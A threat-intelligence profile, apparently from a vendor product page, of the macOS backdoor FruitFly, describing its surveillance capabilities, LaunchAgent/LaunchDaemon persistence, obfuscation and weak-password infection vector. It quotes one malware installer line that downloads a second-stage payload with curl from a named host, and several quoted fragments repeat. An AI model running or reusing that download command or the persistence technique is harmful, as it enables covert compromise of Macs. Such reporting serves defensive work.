FruitFly, also known as Quimitchin and commonly tracked as OSX/FruitFly, is a macOS backdoor used for long-term covert surveillance and remote control of infected Apple systems. It became notable as one of the first widely discussed macOS malware families of 2017 and has been associated with infections that persisted undetected for years. Reporting has linked FruitFly activity to selective targeting of biomedical research institutions, while later sinkholing of related infrastructure showed a broader population of infected Macs, many appearing to be residential systems in the United States.
FruitFly is characterized by extensive operator control over compromised hosts. Documented capabilities include screen capture, keylogging, webcam image capture, host profiling, process enumeration, process termination, arbitrary command execution, file management, and simulated user interaction through mouse movement and keyboard events. Its command set supports reading, writing, renaming, copying, and deleting files, as well as collecting system and network-adjacent information from infected Macs. These features make it suitable for espionage and hands-on remote operations rather than simple smash-and-grab theft.
On macOS, FruitFly uses persistence mechanisms centered on LaunchAgents, and some variants or associated installers also support LaunchDaemons and application trojanization. It has been observed hiding components with dot-prefixed names to reduce visibility in default user views. Analyses of FruitFly.B describe an obfuscated Perl-based persistent component that decodes and launches an embedded Mach-O payload, changes its process name for basic stealth, and communicates with command-and-control infrastructure over a simple tasking protocol. Related installer scripts have shown multiple deployment modes, including user-level persistence, root-level persistence, and replacement of legitimate application executables with wrapper scripts that fetch and launch the malware.
The initial infection vector is not definitively established for all cases. However, associated deployment tooling and law-enforcement reporting indicate operators likely leveraged direct access to exposed Mac services and weak credentials in at least some intrusions. FruitFly’s long dwell time, low detection rate, and broad remote-control functionality mark it as a significant macOS espionage malware family.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
21 distinct techniques documented for this family, organized by ATT&CK tactic.
It still doesn’t help to understand the infection vector, which has been described as port scanning for services with weak or no passwords... AFP, RDP, VNC, SSH (port 22), and Back to My Mac (BTMM), which would be targeted with weak passwords or passwords derived from 3rd party data breaches.
It still doesn’t help to understand the infection vector, which has been described as port scanning for services with weak or no passwords... AFP, RDP, VNC, SSH (port 22), and Back to My Mac (BTMM), which would be targeted with weak passwords or passwords derived from 3rd party data breaches.
Bundlore can persist via a LaunchAgent. Calisto adds a .plist file to the /Library/LaunchAgents folder to maintain persistence. CoinTicker creates user launch agents named .espl.plist and com.apple.[random string].plist to establish persistence.
Let’s try the FILE can end in /+fpsaud to treat up to / as the main drive root and create a root infection option... Doing root /Library/LaunchDaemons/com.adobe.fpsaud2.plist => /Library/Application Support/Adobe/fpsaud ... Wrote /Library/LaunchDaemons/com.adobe.fpsaud2.plist
It still doesn’t help to understand the infection vector, which has been described as port scanning for services with weak or no passwords... AFP, RDP, VNC, SSH (port 22), and Back to My Mac (BTMM), which would be targeted with weak passwords or passwords derived from 3rd party data breaches.
Bundlore can persist via a LaunchAgent. Calisto adds a .plist file to the /Library/LaunchAgents folder to maintain persistence. CoinTicker creates user launch agents named .espl.plist and com.apple.[random string].plist to establish persistence.
Let’s try the FILE can end in /+fpsaud to treat up to / as the main drive root and create a root infection option... Doing root /Library/LaunchDaemons/com.adobe.fpsaud2.plist => /Library/Application Support/Adobe/fpsaud ... Wrote /Library/LaunchDaemons/com.adobe.fpsaud2.plist
"Action RAT's commands, strings, and domains can be Base64 encoded within the payload." / "ADVSTORESHELL... strings... encrypted with an XOR-based algorithm; some strings are also encrypted with 3DES and reversed." / "APT29 has used encoded PowerShell commands." / "APT41 used VMProtected binaries..."
Doing root /Library/LaunchDaemons/com.adobe.fpsaud2.plist => /Library/Application Support/Adobe/fpsaud ... FruitFly has specific code to support this third mode on a few variants of Adobe Acrobat Reader, Google Chrome, and TOCGenerator
The content repeatedly describes malware and threat actors deleting files, directories, droppers, logs, scripts, temporary files, exfiltrated archives, and uninstalling themselves to cover tracks or reduce forensic artifacts.
It still doesn’t help to understand the infection vector, which has been described as port scanning for services with weak or no passwords... AFP, RDP, VNC, SSH (port 22), and Back to My Mac (BTMM), which would be targeted with weak passwords or passwords derived from 3rd party data breaches.
APT19 used Base64 to obfuscate executed commands; APT32 used Invoke-Obfuscation to obfuscate PowerShell; Aquatic Panda encoded PowerShell commands in Base64; numerous groups and malware used Base64, XOR, RC4, compression, encryption, variable substitution, and other methods to obfuscate scripts and commands.
Both generations of Fruitfly also collect information about devices connected to the same network.
Tasklist can be used to discover processes running on a system. Numerous malware families and threat groups are described as listing running processes, collecting PIDs, checking for specific process names, or enumerating loaded modules.
Because there is direct code execution these two modes appear to be used when there is interactive access to the victim machine (for example weak RDP/VNC/SSH passwords)... The attacks via AFP now make sense because this script shows how that kind of access was being leveraged.
Dubbed Fruitfly by some, both malware samples capture screenshots, keystrokes, webcam images, and information about each infected Mac.
After analyzing the new variant, Wardle was able to decrypt several backup domains that were hardcoded into the malware... Within two days of registering one of the addresses, close to 400 infected Macs connected to the server...
This script is responsible for downloading the 2nd stage malicious payload... The second stage payload is downloaded using curl -s tmp1.hopto.org:57777/z.pl ... The .client will be the known malicious Perl script... created with the following code: docmd ( "curl -s tmp1.hopto.org:57777/z.pl > '$_[0]'" );
4 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
18 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Mentioned only as historical comparison for misuse of the macOS defaults utility.
Spyware malware with file deletion capability.
Spyware malware that captures desktop screenshots.
Backdoor malware capable of listing processes on the system.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.